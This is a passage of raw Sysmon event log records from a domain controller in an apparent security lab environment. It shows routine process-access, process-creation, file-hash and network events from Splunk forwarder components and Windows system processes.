Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.583{05ADC7E1-7051-603D-4588-00000000AD01}4396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:05.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B5D76AED10366848BB882BAAB0369BC,SHA256=7CEB58FC322238E5AB24FFD122D59217557A4541F173794141E9DF8E6CB94A25,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.926{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7052-603D-4788-00000000AD01}8888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.926{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.926{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.926{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.926{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.926{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7052-603D-4788-00000000AD01}8888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.926{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7052-603D-4788-00000000AD01}8888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.927{05ADC7E1-7052-603D-4788-00000000AD01}8888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.864{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=557CF3CDD4068BD3CF689DAADF37B186,SHA256=36783004F0747D9DF19EF34B8204083890A191D1D4F8F85DF05B50BA4C5F496D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.587{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2A3E951F9F086DF9F87D3C446A53D43,SHA256=73936C2934B0B09FFA85F66524E16BC20C2A06787A98D334FF2B2809FD358FC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.252{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7052-603D-4688-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.252{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.252{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.252{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.252{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.252{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7052-603D-4688-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.252{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7052-603D-4688-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:06.250{05ADC7E1-7052-603D-4688-00000000AD01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001695305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.549{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55111-false10.0.1.12-8000- 23542300x80000000000000001695325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:07.948{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=003BEC42F917F99E4159E3273A97C5E5,SHA256=296B49C18F741DC746726E11943F156CD5480C0B1465A640003F5C393D81D018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:07.879{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30F7F76BB943BBA357B6F51835F29F7,SHA256=04A86183F7E01BD8DD03890FB40C93AA1D352FDDAED5AA810C9E287AE6FD8B72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:08.895{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36D77D7E3F207D43E27E15759DA6DA0D,SHA256=08BA4DA6D295B30437268FC535525B4279621D5BBB96C8277B2EAB416CD2BB39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.926{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=637C7D80EA368F5F95ED8C0693B8BC3E,SHA256=E3C889ECEC1A67852C4E655687F878AD79AA9E2846DCBD79A90880E917E41C88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.582{05ADC7E1-7055-603D-4888-00000000AD01}43686920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.453{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C4E88B3EB815B3DAC0D9B55827428659,SHA256=47E65E3A8C14C68BA8A81FB3FDF392C6C583579FE5229F0A2D038FED09CFA883,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.395{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7055-603D-4888-00000000AD01}4368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:09.395{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 